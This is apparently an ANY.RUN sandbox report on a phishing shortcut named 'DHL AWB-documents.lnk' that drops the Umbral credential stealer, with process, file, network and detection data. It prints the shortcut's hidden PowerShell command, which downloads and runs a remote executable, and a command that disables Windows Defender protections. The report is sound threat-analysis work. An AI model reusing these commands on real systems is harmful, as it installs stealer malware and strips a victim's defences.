File name:

DHL AWB-documents.lnk

Full analysis: https://app.any.run/tasks/0f78b77a-9e06-408e-81c7-6abb81c9f57e
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: December 23, 2024, 05:40:34
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
auto
umbral
evasion
arch-doc
stealer
discord
exfiltration
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Unicoded KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

5E3249C32A70DC3B8D108C8BFE50C4D0

SHA1:

724787B337134448FD07CC626F9FA7EDF978DB3F

SHA256:

B3BE3371628C3633B544D0E73A2B0DFE93FAEF9F49CEA25B7B88D7A9D9A1BCCF

SSDEEP:

24:8NyZsx/Tff1efVKayWtY+/CWgxiAGfcPa2ijC9tUMkWbjC9WEQWhGO:8LTX1e3ztyhrPaOtH2FQ2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 204)

    • UMBRAL has been found (auto)

      • powershell.exe (PID: 204)
      • setup_x86.exe (PID: 6940)

    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 2744)

    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 2744)

    • Adds path to the Windows Defender exclusion list

      • setup_x86.exe (PID: 6940)

    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 2744)

    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 2744)

    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 2744)

    • Changes settings for real-time protection

      • powershell.exe (PID: 2744)

    • Create files in the Startup directory

      • setup_x86.exe (PID: 6940)

    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 2744)

    • Steals credentials from Web Browsers

      • setup_x86.exe (PID: 6940)

    • Actions looks like stealing of personal data

      • setup_x86.exe (PID: 6940)

  • SUSPICIOUS

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 204)

    • Starts process via Powershell

      • powershell.exe (PID: 204)

    • Manipulates environment variables

      • powershell.exe (PID: 204)

    • Reads security settings of Internet Explorer

      • setup_x86.exe (PID: 6572)

    • Reads the date of Windows installation

      • setup_x86.exe (PID: 6572)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 204)
      • setup_x86.exe (PID: 6940)

    • Application launched itself

      • setup_x86.exe (PID: 6572)

    • Starts POWERSHELL.EXE for commands execution

      • setup_x86.exe (PID: 6940)

    • Script adds exclusion path to Windows Defender

      • setup_x86.exe (PID: 6940)

    • Script disables Windows Defender's IPS

      • setup_x86.exe (PID: 6940)

    • Script disables Windows Defender's real-time protection

      • setup_x86.exe (PID: 6940)

    • Checks for external IP

      • setup_x86.exe (PID: 6940)
      • svchost.exe (PID: 2192)

    • Uses WMIC.EXE to obtain operating system information

      • setup_x86.exe (PID: 6940)

    • Uses WMIC.EXE to obtain computer system information

      • setup_x86.exe (PID: 6940)

    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 5696)

    • Uses WMIC.EXE to obtain Windows Installer data

      • setup_x86.exe (PID: 6940)

    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 6800)

    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 6160)

    • Uses WMIC.EXE to obtain a list of video controllers

      • setup_x86.exe (PID: 6940)

    • The process connected to a server suspected of theft

      • setup_x86.exe (PID: 6940)

  • INFO

    • Disables trace logs

      • setup_x86.exe (PID: 6572)
      • setup_x86.exe (PID: 6940)

    • Checks supported languages

      • setup_x86.exe (PID: 6572)
      • setup_x86.exe (PID: 6940)

    • The executable file from the user directory is run by the Powershell process

      • setup_x86.exe (PID: 6572)

    • The process uses the downloaded file

      • setup_x86.exe (PID: 6572)
      • powershell.exe (PID: 204)

    • Reads Environment values

      • setup_x86.exe (PID: 6572)
      • setup_x86.exe (PID: 6940)

    • Process checks computer location settings

      • setup_x86.exe (PID: 6572)

    • Reads the machine GUID from the registry

      • setup_x86.exe (PID: 6572)
      • setup_x86.exe (PID: 6940)

    • Reads the computer name

      • setup_x86.exe (PID: 6572)
      • setup_x86.exe (PID: 6940)

    • Reads the software policy settings

      • setup_x86.exe (PID: 6572)
      • setup_x86.exe (PID: 6940)

    • Checks proxy server information

      • setup_x86.exe (PID: 6572)
      • setup_x86.exe (PID: 6940)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7048)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7048)
      • powershell.exe (PID: 2744)

    • Creates files in the program directory

      • setup_x86.exe (PID: 6940)

    • Create files in a temporary directory

      • setup_x86.exe (PID: 6940)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 5696)
      • WMIC.exe (PID: 6436)
      • WMIC.exe (PID: 6800)
      • notepad.exe (PID: 7100)
      • rundll32.exe (PID: 3060)
      • WMIC.exe (PID: 6160)

    • Manual execution by a user

      • rundll32.exe (PID: 3060)
      • notepad.exe (PID: 7100)

    • Reads Microsoft Office registry keys

      • rundll32.exe (PID: 3060)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, RelativePath, CommandArgs, Unicode
FileAttributes: (none)
TargetFileSize: -
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
RelativePath: ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
150
Monitored processes
23
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start #UMBRAL powershell.exe conhost.exe no specs setup_x86.exe #UMBRAL setup_x86.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wmic.exe no specs conhost.exe no specs svchost.exe wmic.exe no specs conhost.exe no specs wmic.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wmic.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs notepad.exe no specs rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
204"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
420\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2356\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2612\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2744"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exesetup_x86.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
3060"C:\WINDOWS\System32\rundll32.exe" "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\admin\Desktop\Display.pngC:\Windows\System32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
3608\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5696"wmic.exe" os get CaptionC:\Windows\System32\wbem\WMIC.exesetup_x86.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
6160"wmic.exe" csproduct get uuidC:\Windows\System32\wbem\WMIC.exesetup_x86.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\ucrtbase.dll
Total events
28 766
Read events
28 745
Write events
21
Delete events
0

Modification events

(PID) Process:(6572) setup_x86.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\setup_x86_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6572) setup_x86.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\setup_x86_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6572) setup_x86.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\setup_x86_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(6572) setup_x86.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\setup_x86_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(6572) setup_x86.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\setup_x86_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(6572) setup_x86.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\setup_x86_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(6572) setup_x86.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\setup_x86_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(6572) setup_x86.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\setup_x86_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6572) setup_x86.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\setup_x86_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6572) setup_x86.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\setup_x86_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
2
Suspicious files
8
Text files
13
Unknown types
0

Dropped files

PID
Process
Filename
Type
204powershell.exeC:\Users\admin\Downloads\setup_x86.exeexecutable
MD5:E09F55D421CB45340A8C97C217BA56CF
SHA256:1E8D2F6FA4B8D1EC630758422C493DE85D367F2EB7C76B452B9843ED2B2A7BFF
6940setup_x86.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gskBH.screxecutable
MD5:E09F55D421CB45340A8C97C217BA56CF
SHA256:1E8D2F6FA4B8D1EC630758422C493DE85D367F2EB7C76B452B9843ED2B2A7BFF
7048powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lsd4l4ac.r4p.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
204powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fe6f89e84e68fd0f.customDestinations-msbinary
MD5:8AA6DE7FFEE2F1FB2F45A7978F687443
SHA256:8929000126BFB87C2E72680B144C71A519BEB4FF0C91DB2252064C984D89B320
6940setup_x86.exeC:\Windows\System32\drivers\etc\hoststext
MD5:9BA49696863279CEC09E2141F3626068
SHA256:A62FFFA812E28ABB0E33D80BB691A4460D9CEEBC41FEDDC4655A661270987008
204powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:CB4CB04C496BDF58C14E612D69D2E0A8
SHA256:D0F36CC859D7197B6B9026CC686F7BE69138BC257970BB3D7C6CFC426B6AD9F1
2744powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aykq0tah.r2x.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2744powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_03rd31r1.rz0.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7048powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jhubqw1s.ivl.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6940setup_x86.exeC:\Users\admin\AppData\Local\Temp\hUZH1pUqi9FPPMJbinary
MD5:29A644B1F0D96166A05602FE27B3F4AD
SHA256:BF96902FEB97E990A471492F78EE8386BCF430D66BDAEFDEAFBF912C8CF7CE46
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
38
DNS requests
22
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4716
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4716
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
1544
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6940
setup_x86.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5064
SearchApp.exe
2.23.209.135:443
www.bing.com
Akamai International B.V.
GB
whitelisted
372
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4
System
192.168.100.255:138
whitelisted
1076
svchost.exe
184.28.89.167:443
go.microsoft.com
AKAMAI-AS
US
whitelisted
204
powershell.exe
108.181.20.35:443
files.catbox.moe
TELUS Communications
CA
malicious

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.120
unknown
www.microsoft.com
  • 95.101.149.131
whitelisted
google.com
  • 142.250.185.142
whitelisted
www.bing.com
  • 2.23.209.135
  • 2.23.209.156
  • 2.23.209.141
  • 2.23.209.144
  • 2.23.209.160
  • 2.23.209.148
  • 2.23.209.176
  • 2.23.209.130
  • 2.23.209.140
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
files.catbox.moe
  • 108.181.20.35
malicious
login.live.com
  • 20.190.160.22
  • 40.126.32.138
  • 40.126.32.140
  • 40.126.32.136
  • 40.126.32.133
  • 20.190.160.20
  • 40.126.32.72
  • 40.126.32.68
whitelisted
gstatic.com
  • 142.250.186.163
whitelisted
ip-api.com
  • 208.95.112.1
shared

Threats

PID
Process
Class
Message
204
powershell.exe
Potentially Bad Traffic
ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)
2192
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2192
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
6940
setup_x86.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
2192
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
6940
setup_x86.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
6940
setup_x86.exe
Successful Credential Theft Detected
STEALER [ANY.RUN] Attempt to exfiltrate via Discord
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
DHL AWB-documents.lnk